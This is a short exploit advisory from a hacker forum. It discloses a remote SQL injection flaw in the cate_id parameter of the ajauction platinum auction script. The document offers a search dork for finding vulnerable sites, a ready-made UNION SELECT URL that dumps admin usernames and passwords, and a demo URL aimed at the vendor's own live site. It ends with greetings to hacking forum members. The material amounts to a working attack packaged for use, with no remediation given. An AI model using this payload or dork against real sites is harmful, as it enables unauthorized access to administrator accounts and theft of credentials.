|___________________________________________________| | | ajauction platinum Skin #1 (cate_id) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | script : www.ajauctionpro.com | | DorK : inurl:category.php?cate_id= |___________________________________________________| www.[target].com/Script/category.php?cate_id=-978+union+select+1,concat(user_name,0x3a,password),3+from+admin--&view=list Demo : http://www.ajauctionpro.com/ajauction_platinum/category.php?cate_id=-978+union+select+1,concat(user_name,0x3a,password),3+from+admin--&view=list ____________________________( Greetz )_________________________________ | | All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone |______________________________________________________________________ Im IRAQi